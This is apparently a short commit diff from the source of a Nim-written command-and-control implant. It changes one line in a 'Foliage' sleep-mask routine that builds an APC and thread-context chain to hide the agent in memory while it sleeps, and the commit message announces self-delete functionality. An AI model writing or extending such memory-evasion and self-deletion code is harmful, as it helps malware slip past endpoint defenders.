Improved 'exit' command and implemented self-delete functionality.

2025-10-24 12:26:44 +02:00
parent 7326cc10b6
commit 0e9cffb1c4
5 changed files with 105 additions and 14 deletions
--- a/src/agent/core/sleepmask.nim
+++ b/src/agent/core/sleepmask.nim
@@ -548,7 +548,7 @@ proc sleepFoliage(apis: Apis, key, img: USTRING, sleepDelay: int) =
        inc gadget
        
        # ctx[6] contains the final call, which exits the created thread after all APC calls have been executed.
-        ctx[gadget].Rip = cast[DWORD64](ExitThread)
+        ctx[gadget].Rip = cast[DWORD64](winbase.ExitThread)
        ctx[gadget].Rcx = cast[DWORD64](0)

        # Queueing the chain